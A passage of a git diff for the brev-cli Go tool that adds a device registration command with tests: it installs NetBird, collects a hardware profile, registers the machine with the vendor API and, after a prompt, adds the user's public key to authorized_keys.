terminal.PromptSelectInput(terminal.PromptSelectContent{ + Label: label, + Items: []string{"Yes, proceed", "No, cancel"}, + }) + return result == "Yes, proceed" +} + +func (TerminalPrompter) Select(label string, items []string) string { + return terminal.PromptSelectInput(terminal.PromptSelectContent{ + Label: label, + Items: items, + }) +} + +// NetBirdManager handles NetBird installation and uninstallation. +type NetBirdManager struct{} + +func (NetBirdManager) Install() error { return InstallNetbird() } +func (NetBirdManager) Uninstall() error { return UninstallNetbird() } + +// ShellSetupRunner runs setup scripts via shell. +type ShellSetupRunner struct{} + +func (ShellSetupRunner) RunSetup(script string) error { return runSetupCommand(script) } + +// DefaultNodeClientFactory creates real ConnectRPC clients. +type DefaultNodeClientFactory struct{} + +func (DefaultNodeClientFactory) NewNodeClient(provider TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient { + return NewNodeServiceClient(provider, baseURL) +} diff --git a/pkg/cmd/register/register.go b/pkg/cmd/register/register.go index 1c16586bc..b000386da 100644 --- a/pkg/cmd/register/register.go +++ b/pkg/cmd/register/register.go @@ -1,44 +1,319 @@ -// Package register provides the brev register command for DGX Spark registration +// Package register provides the brev register command for device registration package register import ( + "context" + "fmt" + "os" + "os/user" + "path/filepath" + "strings" + "time" + + nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" + nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" + "connectrpc.com/connect" + "github.com/google/uuid" + + "github.com/brevdev/brev-cli/pkg/config" + "github.com/brevdev/brev-cli/pkg/entity" + breverrors "github.com/brevdev/brev-cli/pkg/errors" "github.com/brevdev/brev-cli/pkg/terminal" "github.com/spf13/cobra" ) +// RegisterStore defines the store methods needed by the register command. +type RegisterStore interface { + GetCurrentUser() (*entity.User, error) + GetActiveOrganizationOrDefault() (*entity.Organization, error) + GetBrevHomePath() (string, error) + GetAccessToken() (string, error) +} + +// OSFileReader reads files from the real OS filesystem. +type OSFileReader struct{} + +func (r OSFileReader) ReadFile(path string) ([]byte, error) { + data, err := os.ReadFile(path) // #nosec G304 + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + return data, nil +} + +// PlatformChecker checks whether the current platform is supported. +type PlatformChecker interface { + IsCompatible() bool +} + +// Confirmer prompts for yes/no confirmation. +type Confirmer interface { + ConfirmYesNo(label string) bool +} + +// NetBirdInstaller installs the NetBird network agent. +type NetBirdInstaller interface { + Install() error +} + +// SetupRunner runs a setup script on the local machine. +type SetupRunner interface { + RunSetup(script string) error +} + +// NodeClientFactory creates ConnectRPC ExternalNodeService clients. +type NodeClientFactory interface { + NewNodeClient(provider TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient +} + +// registerDeps bundles the side-effecting dependencies of runRegister so they +// can be replaced in tests. +type registerDeps struct { + platform PlatformChecker + prompter Confirmer + netbird NetBirdInstaller + setupRunner SetupRunner + nodeClients NodeClientFactory + commandRunner CommandRunner + fileReader FileReader + registrationStore RegistrationStore +} + +func defaultRegisterDeps(brevHome string) registerDeps { + return registerDeps{ + platform: LinuxPlatform{}, + prompter: TerminalPrompter{}, + netbird: NetBirdManager{}, + setupRunner: ShellSetupRunner{}, + nodeClients: DefaultNodeClientFactory{}, + commandRunner: ExecCommandRunner{}, + fileReader: OSFileReader{}, + registrationStore: NewFileRegistrationStore(brevHome), + } +} + var ( - registerLong = `Register your DGX Spark with NVIDIA Brev + registerLong = `Register your device with NVIDIA Brev -Join the waitlist to be among the first to register your DGX Spark -for early access integration with Brev.` +This command installs NetBird (network agent), and registers this machine with Brev.` - registerExample = ` brev register` + registerExample = ` brev register "My DGX Spark"` ) -func NewCmdRegister(t *terminal.Terminal) *cobra.Command { +func NewCmdRegister(t *terminal.Terminal, store RegisterStore) *cobra.Command { cmd := &cobra.Command{ Annotations: map[string]string{"configuration": ""}, - Use: "register", - Aliases: []string{"spark"}, + Use: "register ", DisableFlagsInUseLine: true, - Short: "Register your DGX Spark with Brev", + Short: "Register this device with Brev", Long: registerLong, Example: registerExample, + Args: cobra.ExactArgs(1), RunE: func(cmd *cobra.Command, args []string) error { - runRegister(t) - return nil + brevHome, err := store.GetBrevHomePath() + if err != nil { + return breverrors.WrapAndTrace(err) + } + return runRegister(cmd.Context(), t, store, args[0], defaultRegisterDeps(brevHome)) }, } return cmd } -func runRegister(t *terminal.Terminal) { - t.Vprint("\n") - t.Vprint(t.Green("Thanks so much for your interest in registering your DGX Spark with Brev!\n\n")) - t.Vprint("To be on the waitlist for early access to this feature, please fill out this form:\n\n") - t.Vprint(t.Yellow(" 👉 https://forms.gle/RHCHGmZuiMQQ2faA6\n\n")) - t.Vprint("We will reach out to the provided email with updates and instructions on how to register soon (:\n") - t.Vprint("\n") +func runRegister(ctx context.Context, t *terminal.Terminal, s RegisterStore, name string, deps registerDeps) error { //nolint:funlen // registration flow + org, err := getOrgToRegisterFor(deps, s) + if err != nil { + return err + } + + brevUser, err := s.GetCurrentUser() + if err != nil { + return breverrors.WrapAndTrace(err) + } + + u, _ := user.Current() + linuxUser := u.Username + + t.Vprint("") + t.Vprint(t.Green("Registering your device with Brev")) + t.Vprint("") + t.Vprintf(" Name: %s\n", t.Yellow(name)) + t.Vprintf(" Organization: %s\n", org.Name) + t.Vprintf(" Registering for Linux user: %s\n", linuxUser) + t.Vprint("") + t.Vprint("This will perform the following steps:") + t.Vprint(" 1. Install NetBird") + t.Vprint(" 2. Collect hardware profile") + t.Vprint(" 3. Register this machine with Brev") + t.Vprint("") + + if !deps.prompter.ConfirmYesNo("Proceed with registration?") { + t.Vprint("Registration canceled.") + return nil + } + + t.Vprint("") + t.Vprint(t.Yellow("[Step 1/3] Installing NetBird...")) + if err := deps.netbird.Install(); err != nil { + return fmt.Errorf("NetBird installation failed: %w", err) + } + t.Vprint(t.Green(" NetBird installed successfully.")) + + t.Vprint("") + t.Vprint(t.Yellow("[Step 2/3] Collecting hardware profile...")) + t.Vprint("") + + nodeSpec, err := CollectHardwareProfile(deps.commandRunner, deps.fileReader) + if err != nil { + return fmt.Errorf("failed to collect hardware profile: %w", err) + } + + t.Vprint(" Hardware profile:") + t.Vprint(FormatNodeSpec(nodeSpec)) + + t.Vprint("") + t.Vprint(t.Yellow("[Step 3/3] Registering with Brev...")) + + deviceID := uuid.New().String() + client := deps.nodeClients.NewNodeClient(s, config.GlobalConfig.GetBrevPublicAPIURL()) + addResp, err := client.AddNode(ctx, connect.NewRequest(&nodev1.AddNodeRequest{ + OrganizationId: org.ID, + Name: name, + DeviceId: deviceID, + NodeSpec: toProtoNodeSpec(nodeSpec), + })) + if err != nil { + return fmt.Errorf("failed to register node: %w", err) + } + + node := addResp.Msg.GetExternalNode() + reg := &DeviceRegistration{ + ExternalNodeID: node.GetExternalNodeId(), + DisplayName: name, + OrgID: org.ID, + DeviceID: deviceID, + RegisteredAt: time.Now().UTC().Format(time.RFC3339), + NodeSpec: *nodeSpec, + } + if err := deps.registrationStore.Save(reg); err != nil { + return fmt.Errorf("node registered but failed to save locally: %w", err) + } + + t.Vprint(t.Green(" Registration complete.")) + + if ci := node.GetConnectivityInfo(); ci != nil { + if cmd := ci.GetRegistrationCommand(); cmd != "" { + if err := deps.setupRunner.RunSetup(cmd); err != nil { + t.Vprintf(" Warning: setup command failed: %v\n", err) + } + } + } + + if deps.prompter.ConfirmYesNo("Would you like to enable SSH access to this device?") { + grantSSHAccess(ctx, t, deps, s, reg, brevUser, u) + } + + return nil +} + +func grantSSHAccess(ctx context.Context, t *terminal.Terminal, deps registerDeps, tokenProvider TokenProvider, reg *DeviceRegistration, brevUser *entity.User, u *user.User) { + t.Vprint("") + t.Vprint(t.Green("Enabling SSH access on this device")) + t.Vprint("") + t.Vprintf(" Node: %s (%s)\n", reg.DisplayName, reg.ExternalNodeID) + t.Vprintf(" Brev user: %s\n", brevUser.ID) + t.Vprintf(" Linux user: %s\n", u.Username) + t.Vprint("") + + client := deps.nodeClients.NewNodeClient(tokenProvider, config.GlobalConfig.GetBrevPublicAPIURL()) + if _, err := client.GrantNodeSSHAccess(ctx, connect.NewRequest(&nodev1.GrantNodeSSHAccessRequest{ + ExternalNodeId: reg.ExternalNodeID, + UserId: brevUser.ID, + LinuxUser: u.Username, + })); err != nil { + t.Vprintf(" Warning: failed to enable SSH: %v\n", err) + return + } + + if brevUser.PublicKey != "" { + if err := installAuthorizedKey(u, brevUser.PublicKey); err != nil { + t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to install SSH public key: %v", err))) + } else { + t.Vprint(" Brev public key added to authorized_keys.") + } + } + + t.Vprint(t.Green(fmt.Sprintf("SSH access enabled. You can now SSH to this device via: brev shell %s", reg.DisplayName))) +} + +const brevKeyComment = "# brev-cli" + +// installAuthorizedKey appends the given public key to the user's +// ~/.ssh/authorized_keys if it isn't already present. The key is tagged with +// a brev-cli comment so it can be identified and removed during deregistration. +func installAuthorizedKey(u *user.User, pubKey string) error { + pubKey = strings.TrimSpace(pubKey) + if pubKey == "" { + return nil + } + + sshDir := filepath.Join(u.HomeDir, ".ssh") + if err := os.MkdirAll(sshDir, 0o700); err != nil { + return fmt.Errorf("creating .ssh directory: %w", err) + } + + authKeysPath := filepath.Join(sshDir, "authorized_keys") + + existing, err := os.ReadFile(authKeysPath) // #nosec G304 + if err != nil && !os.IsNotExist(err) { + return fmt.Errorf("reading authorized_keys: %w", err) + } + + if strings.Contains(string(existing), pubKey) { + return nil // already present (tagged or not) + } + + taggedKey := pubKey + " " + brevKeyComment + + content := string(existing) + if len(content) > 0 && !strings.HasSuffix(content, "\n") { + content += "\n" + } + content += taggedKey + "\n" + + if err := os.WriteFile(authKeysPath, []byte(content), 0o600); err != nil { + return fmt.Errorf("writing authorized_keys: %w", err) + } + + return nil +} + +func getOrgToRegisterFor(deps registerDeps, s RegisterStore) (*entity.Organization, error) { + if !deps.platform.IsCompatible() { + return nil, fmt.Errorf("brev register is only supported on Linux") + } + + _, err := s.GetCurrentUser() // ensure active token + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + + org, err := s.GetActiveOrganizationOrDefault() + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + if org == nil { + return nil, fmt.Errorf("no organization found; please create or join an organization first") + } + + alreadyRegistered, err := deps.registrationStore.Exists() + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + if alreadyRegistered { + return nil, fmt.Errorf("this machine is already registered; run 'brev deregister' first to re-register") + } + return org, nil } diff --git a/pkg/cmd/register/register_test.go b/pkg/cmd/register/register_test.go new file mode 100644 index 000000000..473acc401 --- /dev/null +++ b/pkg/cmd/register/register_test.go @@ -0,0 +1,359 @@ +package register + +import ( + "context" + "fmt" + "net/http/httptest" + "testing" + + nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" + nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" + "connectrpc.com/connect" + + "github.com/brevdev/brev-cli/pkg/entity" + "github.com/brevdev/brev-cli/pkg/terminal" +) + +// mockRegisterStore satisfies RegisterStore for orchestration tests. +type mockRegisterStore struct { + user *entity.User + org *entity.Organization + home string + token string + err error +} + +func (m *mockRegisterStore) GetCurrentUser() (*entity.User, error) { + if m.err != nil { + return nil, m.err + } + return m.user, nil +} + +func (m *mockRegisterStore) GetActiveOrganizationOrDefault() (*entity.Organization, error) { + return m.org, nil +} + +func (m *mockRegisterStore) GetBrevHomePath() (string, error) { return m.home, nil } +func (m *mockRegisterStore) GetAccessToken() (string, error) { return m.token, nil } + +// mockRegistrationStore satisfies RegistrationStore for orchestration tests. +type mockRegistrationStore struct { + reg *DeviceRegistration +} + +func (m *mockRegistrationStore) Save(reg *DeviceRegistration) error { + m.reg = reg + return nil +} + +func (m *mockRegistrationStore) Load() (*DeviceRegistration, error) { + if m.reg == nil { + return nil, fmt.Errorf("no registration") + } + return m.reg, nil +} + +func (m *mockRegistrationStore) Delete() error { + m.reg = nil + return nil +} + +func (m *mockRegistrationStore) Exists() (bool, error) { + return m.reg != nil, nil +} + +// mock types for registerDeps interfaces + +type mockPlatform struct{ compatible bool } + +func (m mockPlatform) IsCompatible() bool { return m.compatible } + +type mockConfirmer struct{ confirm bool } + +func (m mockConfirmer) ConfirmYesNo(_ string) bool { return m.confirm } + +type mockNetBirdInstaller struct{ err error } + +func (m mockNetBirdInstaller) Install() error { return m.err } + +type mockSetupRunner struct { + called bool + cmd string + err error +} + +func (m *mockSetupRunner) RunSetup(script string) error { + m.called = true + m.cmd = script + return m.err +} + +type mockNodeClientFactory struct { + serverURL string +} + +func (m mockNodeClientFactory) NewNodeClient(provider TokenProvider, _ string) nodev1connect.ExternalNodeServiceClient { + return NewNodeServiceClient(provider, m.serverURL) +} + +// testRegisterDeps returns deps with all side effects stubbed out, and a fake +// ConnectRPC server backed by the provided fakeNodeService. +func testRegisterDeps(t *testing.T, svc *fakeNodeService, regStore RegistrationStore) (registerDeps, *httptest.Server) { + t.Helper() + + _, handler := nodev1connect.NewExternalNodeServiceHandler(svc) + server := httptest.NewServer(handler) + + return registerDeps{ + platform: mockPlatform{compatible: true}, + prompter: mockConfirmer{confirm: true}, + netbird: mockNetBirdInstaller{}, + setupRunner: &mockSetupRunner{}, + nodeClients: mockNodeClientFactory{serverURL: server.URL}, + commandRunner: &mockCommandRunner{ + outputs: map[string][]byte{ + "nvidia-smi": []byte("NVIDIA GB10, 131072\n"), + "lsblk": []byte("nvme0n1 500107862016 disk 0\n"), + }, + }, + fileReader: &mockFileReader{ + files: map[string][]byte{ + "/proc/cpuinfo": []byte("processor\t: 0\nprocessor\t: 1\n"), + "/proc/meminfo": []byte("MemTotal: 131886028 kB\n"), + "/etc/os-release": []byte("NAME=\"Ubuntu\"\nVERSION_ID=\"24.04\"\n"), + }, + }, + registrationStore: regStore, + }, server +} + +func Test_runRegister_HappyPath(t *testing.T) { + regStore := &mockRegistrationStore{} + + store := &mockRegisterStore{ + user: &entity.User{ID: "user_1"}, + org: &entity.Organization{ID: "org_123", Name: "TestOrg"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{ + addNodeFn: func(req *nodev1.AddNodeRequest) (*nodev1.AddNodeResponse, error) { + if req.GetOrganizationId() != "org_123" { + t.Errorf("unexpected org: %s", req.GetOrganizationId()) + } + if req.GetName() != "My Spark" { + t.Errorf("unexpected name: %s", req.GetName()) + } + return &nodev1.AddNodeResponse{ + ExternalNode: &nodev1.ExternalNode{ + ExternalNodeId: "unode_abc", + OrganizationId: "org_123", + Name: req.GetName(), + DeviceId: req.GetDeviceId(), + ConnectivityInfo: &nodev1.ConnectivityInfo{ + RegistrationCommand: "netbird up --key abc", + }, + }, + }, nil + }, + } + + setupRunner := &mockSetupRunner{} + + deps, server := testRegisterDeps(t, svc, regStore) + defer server.Close() + + deps.setupRunner = setupRunner + + term := terminal.New() + err := runRegister(context.Background(), term, store, "My Spark", deps) + if err != nil { + t.Fatalf("runRegister failed: %v", err) + } + + // Verify registration was persisted + exists, err := regStore.Exists() + if err != nil { + t.Fatalf("Exists error: %v", err) + } + if !exists { + t.Fatal("expected registration to exist after successful register") + } + + reg, err := regStore.Load() + if err != nil { + t.Fatalf("Load failed: %v", err) + } + if reg.ExternalNodeID != "unode_abc" { + t.Errorf("expected ExternalNodeID unode_abc, got %s", reg.ExternalNodeID) + } + if reg.DisplayName != "My Spark" { + t.Errorf("expected display name 'My Spark', got %s", reg.DisplayName) + } + if reg.OrgID != "org_123" { + t.Errorf("expected org org_123, got %s", reg.OrgID) + } + + // Verify setup command was executed + if setupRunner.cmd != "netbird up --key abc" { + t.Errorf("expected setup command 'netbird up --key abc', got %q", setupRunner.cmd) + } +} + +func Test_runRegister_UserCancels(t *testing.T) { + regStore := &mockRegistrationStore{} + + store := &mockRegisterStore{ + user: &entity.User{ID: "user_1"}, + org: &entity.Organization{ID: "org_123", Name: "TestOrg"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{} + deps, server := testRegisterDeps(t, svc, regStore) + defer server.Close() + + deps.prompter = mockConfirmer{confirm: false} + + term := terminal.New() + err := runRegister(context.Background(), term, store, "My Spark", deps) + if err != nil { + t.Fatalf("expected nil error on cancel, got: %v", err) + } + + // Registration should not exist + exists, err := regStore.Exists() + if err != nil { + t.Fatalf("Exists error: %v", err) + } + if exists { + t.Error("registration should not exist after cancel") + } +} + +func Test_runRegister_AlreadyRegistered(t *testing.T) { + regStore := &mockRegistrationStore{ + reg: &DeviceRegistration{ + ExternalNodeID: "unode_existing", + DisplayName: "Existing", + }, + } + + store := &mockRegisterStore{ + user: &entity.User{ID: "user_1"}, + org: &entity.Organization{ID: "org_123", Name: "TestOrg"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{} + deps, server := testRegisterDeps(t, svc, regStore) + defer server.Close() + + term := terminal.New() + err := runRegister(context.Background(), term, store, "My Spark", deps) + if err == nil { + t.Fatal("expected error for already-registered machine") + } +} + +func Test_runRegister_NoOrganization(t *testing.T) { + regStore := &mockRegistrationStore{} + + store := &mockRegisterStore{ + user: &entity.User{ID: "user_1"}, + org: nil, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{} + deps, server := testRegisterDeps(t, svc, regStore) + defer server.Close() + + term := terminal.New() + err := runRegister(context.Background(), term, store, "My Spark", deps) + if err == nil { + t.Fatal("expected error when no org exists") + } +} + +func Test_runRegister_AddNodeFails(t *testing.T) { + regStore := &mockRegistrationStore{} + + store := &mockRegisterStore{ + user: &entity.User{ID: "user_1"}, + org: &entity.Organization{ID: "org_123", Name: "TestOrg"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{ + addNodeFn: func(_ *nodev1.AddNodeRequest) (*nodev1.AddNodeResponse, error) { + return nil, connect.NewError(connect.CodeInternal, nil) + }, + } + + deps, server := testRegisterDeps(t, svc, regStore) + defer server.Close() + + term := terminal.New() + err := runRegister(context.Background(), term, store, "My Spark", deps) + if err == nil { + t.Fatal("expected error when AddNode fails") + } + + // Registration should not exist on failure + exists, err := regStore.Exists() + if err != nil { + t.Fatalf("Exists error: %v", err) + } + if exists { + t.Error("registration should not exist after AddNode failure") + } +} + +func Test_runRegister_NoSetupCommand(t *testing.T) { + regStore := &mockRegistrationStore{} + + store := &mockRegisterStore{ + user: &entity.User{ID: "user_1"}, + org: &entity.Organization{ID: "org_123", Name: "TestOrg"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{ + addNodeFn: func(req *nodev1.AddNodeRequest) (*nodev1.AddNodeResponse, error) { + return &nodev1.AddNodeResponse{ + ExternalNode: &nodev1.ExternalNode{ + ExternalNodeId: "unode_abc", + OrganizationId: "org_123", + Name: req.GetName(), + DeviceId: req.GetDeviceId(), + }, + // No ConnectivityInfo / RegistrationCommand + }, nil + }, + } + + setupRunner := &mockSetupRunner{} + + deps, server := testRegisterDeps(t, svc, regStore) + defer server.Close() + + deps.setupRunner = setupRunner + + term := terminal.New() + err := runRegister(context.Background(), term, store, "My Spark", deps) + if err != nil { + t.Fatalf("runRegister failed: %v", err) + } + + if setupRunner.called { + t.Error("setup command should not be called when empty") + } +} diff --git a/pkg/cmd/register/registration_store.go b/pkg/cmd/register/registration_store.go new file mode 100644 index 000000000..0161ce765 --- /dev/null +++ b/pkg/cmd/register/registration_store.go @@ -0,0 +1,92 @@ +package register + +import ( + "encoding/json" + "os" + "path/filepath" + + breverrors "github.com/brevdev/brev-cli/pkg/errors" + "github.com/brevdev/brev-cli/pkg/files" + "github.com/spf13/afero" +) + +const registrationFileName = "device_registration.json" + +// DeviceRegistration is the persistent identity file for a registered device. +// Fields align with the AddNodeResponse from dev-plane. +type DeviceRegistration struct { + ExternalNodeID string `json:"external_node_id"` + DisplayName string `json:"display_name"` + OrgID string `json:"org_id"` + DeviceID string `json:"device_id"` + RegisteredAt string `json:"registered_at"` + NodeSpec NodeSpec `json:"node_spec"` +} + +// RegistrationStore defines the contract for persisting device registration data. +type RegistrationStore interface { + Save(reg *DeviceRegistration) error + Load() (*DeviceRegistration, error) + Delete() error + Exists() (bool, error) +} + +// FileRegistrationStore implements RegistrationStore using the local filesystem. +type FileRegistrationStore struct { + brevHome string +} + +// NewFileRegistrationStore returns a FileRegistrationStore rooted at brevHome. +func NewFileRegistrationStore(brevHome string) *FileRegistrationStore { + return &FileRegistrationStore{brevHome: brevHome} +} + +func (s *FileRegistrationStore) path() string { + return filepath.Join(s.brevHome, registrationFileName) +} + +func (s *FileRegistrationStore) Save(reg *DeviceRegistration) error { + path := s.path() + data, err := json.MarshalIndent(reg, "", " ") + if err != nil { + return breverrors.WrapAndTrace(err) + } + if err := files.AppFs.MkdirAll(filepath.Dir(path), 0o700); err != nil { + return breverrors.WrapAndTrace(err) + } + if err := afero.WriteFile(files.AppFs, path, data, 0o600); err != nil { + return breverrors.WrapAndTrace(err) + } + return nil +} + +func (s *FileRegistrationStore) Load() (*DeviceRegistration, error) { + path := s.path() + var reg DeviceRegistration + err := files.ReadJSON(files.AppFs, path, ®) + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + return ®, nil +} + +func (s *FileRegistrationStore) Delete() error { + path := s.path() + err := files.DeleteFile(files.AppFs, path) + if err != nil { + return breverrors.WrapAndTrace(err) + } + return nil +} + +func (s *FileRegistrationStore) Exists() (bool, error) { + path := s.path() + _, err := files.AppFs.Stat(path) + if err == nil { + return true, nil + } + if os.IsNotExist(err) { + return false, nil + } + return false, breverrors.WrapAndTrace(err) +} diff --git a/pkg/cmd/register/registration_store_test.go b/pkg/cmd/register/registration_store_test.go new file mode 100644 index 000000000..6e14514d3 --- /dev/null +++ b/pkg/cmd/register/registration_store_test.go @@ -0,0 +1,158 @@ +package register + +import ( + "testing" + + "github.com/brevdev/brev-cli/pkg/files" + "github.com/spf13/afero" +) + +func setupTestFs(t *testing.T) (string, func()) { + t.Helper() + origFs := files.AppFs + files.AppFs = afero.NewMemMapFs() + brevHome := "/home/testuser/.brev" + if err := files.AppFs.MkdirAll(brevHome, 0o770); err != nil { + t.Fatalf("failed to create test dir: %v", err) + } + return brevHome, func() { files.AppFs = origFs } +} + +func Test_SaveAndLoadRegistration_RoundTrip(t *testing.T) { + brevHome, cleanup := setupTestFs(t) + defer cleanup() + + store := NewFileRegistrationStore(brevHome) + + cpuCount := int32(12) + ramBytes := int64(137438953472) + reg := &DeviceRegistration{ + ExternalNodeID: "unode_abc123", + DisplayName: "My Spark", + OrgID: "org_xyz", + DeviceID: "device-uuid-123", + RegisteredAt: "2026-02-25T00:00:00Z", + NodeSpec: NodeSpec{ + CPUCount: &cpuCount, + RAMBytes: &ramBytes, + Architecture: "arm64", + }, + } + + if err := store.Save(reg); err != nil { + t.Fatalf("Save failed: %v", err) + } + + loaded, err := store.Load() + if err != nil { + t.Fatalf("Load failed: %v", err) + } + + if loaded.ExternalNodeID != reg.ExternalNodeID { + t.Errorf("ExternalNodeID mismatch: got %s, want %s", loaded.ExternalNodeID, reg.ExternalNodeID) + } + if loaded.DisplayName != reg.DisplayName { + t.Errorf("DisplayName mismatch: got %s, want %s", loaded.DisplayName, reg.DisplayName) + } + if loaded.OrgID != reg.OrgID { + t.Errorf("OrgID mismatch: got %s, want %s", loaded.OrgID, reg.OrgID) + } + if loaded.DeviceID != reg.DeviceID { + t.Errorf("DeviceID mismatch: got %s, want %s", loaded.DeviceID, reg.DeviceID) + } + if loaded.NodeSpec.Architecture != "arm64" { + t.Errorf("Architecture mismatch: got %s", loaded.NodeSpec.Architecture) + } + if loaded.NodeSpec.CPUCount == nil || *loaded.NodeSpec.CPUCount != 12 { + t.Errorf("CPUCount mismatch: got %v", loaded.NodeSpec.CPUCount) + } +} + +func Test_RegistrationExists_ReturnsFalseWhenMissing(t *testing.T) { + brevHome, cleanup := setupTestFs(t) + defer cleanup() + + store := NewFileRegistrationStore(brevHome) + + exists, err := store.Exists() + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if exists { + t.Error("expected Exists to return false") + } +} + +func Test_RegistrationExists_ReturnsTrueAfterSave(t *testing.T) { + brevHome, cleanup := setupTestFs(t) + defer cleanup() + + store := NewFileRegistrationStore(brevHome) + + reg := &DeviceRegistration{ + ExternalNodeID: "unode_abc123", + DisplayName: "Test", + } + if err := store.Save(reg); err != nil { + t.Fatalf("Save failed: %v", err) + } + + exists, err := store.Exists() + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if !exists { + t.Error("expected Exists to return true") + } +} + +func Test_DeleteRegistration_RemovesFile(t *testing.T) { + brevHome, cleanup := setupTestFs(t) + defer cleanup() + + store := NewFileRegistrationStore(brevHome) + + reg := &DeviceRegistration{ + ExternalNodeID: "unode_abc123", + DisplayName: "Test", + } + if err := store.Save(reg); err != nil { + t.Fatalf("Save failed: %v", err) + } + + if err := store.Delete(); err != nil { + t.Fatalf("Delete failed: %v", err) + } + + exists, err := store.Exists() + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if exists { + t.Error("expected Exists to return false after delete") + } +} + +func Test_LoadRegistration_FailsWhenMissing(t *testing.T) { + brevHome, cleanup := setupTestFs(t) + defer cleanup() + + store := NewFileRegistrationStore(brevHome) + + _, err := store.Load() + if err == nil { + t.Error("expected error loading missing registration") + } +} + +func Test_DeleteRegistration_FailsWhenMissing(t *testing.T) { + brevHome, cleanup := setupTestFs(t) + defer cleanup() + + store := NewFileRegistrationStore(brevHome) + + err := store.Delete() + if err == nil { + t.Error("expected error deleting missing registration") + } +} diff --git a/pkg/cmd/register/rpcclient.go b/pkg/cmd/register/rpcclient.go new file mode 100644 index 000000000..842682fe3 --- /dev/null +++ b/pkg/cmd/register/rpcclient.go @@ -0,0 +1,99 @@ +package register + +import ( + "net/http" + + nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" + nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" + + breverrors "github.com/brevdev/brev-cli/pkg/errors" +) + +// TokenProvider abstracts access token retrieval for the HTTP transport. +type TokenProvider interface { + GetAccessToken() (string, error) +} + +// bearerTokenTransport injects a Bearer token into every request. +// We use a custom RoundTripper instead of setting headers on individual +// client.Do() calls because ConnectRPC owns the HTTP requests internally — +// this is the only hook we have to add auth headers. +type bearerTokenTransport struct { + provider TokenProvider + base http.RoundTripper +} + +func (t *bearerTokenTransport) RoundTrip(req *http.Request) (*http.Response, error) { + token, err := t.provider.GetAccessToken() + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + req = req.Clone(req.Context()) + req.Header.Set("Authorization", "Bearer "+token) + resp, err := t.base.RoundTrip(req) + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + return resp, nil +} + +// newAuthenticatedHTTPClient creates an http.Client that injects the bearer token +// from the given provider on every request. +func newAuthenticatedHTTPClient(provider TokenProvider) *http.Client { + return &http.Client{ + Transport: &bearerTokenTransport{ + provider: provider, + base: http.DefaultTransport, + }, + } +} + +// NewNodeServiceClient creates a ConnectRPC ExternalNodeServiceClient using the +// given token provider for authentication. +func NewNodeServiceClient(provider TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient { + return nodev1connect.NewExternalNodeServiceClient( + newAuthenticatedHTTPClient(provider), + baseURL, + ) +} + +// toProtoNodeSpec converts the local NodeSpec (used for collection, display, persistence) +// to the generated proto NodeSpec for RPC calls. +func toProtoNodeSpec(s *NodeSpec) *nodev1.NodeSpec { + if s == nil { + return nil + } + + proto := &nodev1.NodeSpec{ + RamBytes: s.RAMBytes, + CpuCount: s.CPUCount, + } + + for _, st := range s.Storage { + proto.Storage = append(proto.Storage, &nodev1.StorageSpec{ + StorageBytes: st.StorageBytes, + StorageType: st.StorageType, + }) + } + + if s.Architecture != "" { + proto.Architecture = &s.Architecture + } + if s.OS != "" { + proto.Os = &s.OS + } + if s.OSVersion != "" { + proto.OsVersion = &s.OSVersion + } + + for _, g := range s.GPUs { + pg := &nodev1.GPUSpec{ + Model: g.Model, + Count: g.Count, + MemoryBytes: g.MemoryBytes, + } + proto.Gpus = append(proto.Gpus, pg) + } + + return proto +} diff --git a/pkg/cmd/register/rpcclient_test.go b/pkg/cmd/register/rpcclient_test.go new file mode 100644 index 000000000..561230949 --- /dev/null +++ b/pkg/cmd/register/rpcclient_test.go @@ -0,0 +1,274 @@ +package register + +import ( + "context" + "net/http" + "net/http/httptest" + "testing" + + nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" + nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" + "connectrpc.com/connect" +) + +type mockTokenProvider struct { + token string + err error +} + +func (m *mockTokenProvider) GetAccessToken() (string, error) { + return m.token, m.err +} + +func Test_bearerTokenTransport_InjectsHeader(t *testing.T) { + var gotAuth string + server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotAuth = r.Header.Get("Authorization") + w.WriteHeader(http.StatusOK) + })) + defer server.Close() + + provider := &mockTokenProvider{token: "test-token-123"} + client := newAuthenticatedHTTPClient(provider) + + req, _ := http.NewRequestWithContext(context.Background(), http.MethodGet, server.URL, nil) + resp, err := client.Do(req) + if err != nil { + t.Fatalf("request failed: %v", err) + } + defer resp.Body.Close() //nolint:errcheck // test + + if gotAuth != "Bearer test-token-123" { + t.Errorf("expected 'Bearer test-token-123', got %q", gotAuth) + } +} + +func Test_bearerTokenTransport_PropagatesTokenError(t *testing.T) { + provider := &mockTokenProvider{err: http.ErrAbortHandler} + client := newAuthenticatedHTTPClient(provider) + + req, _ := 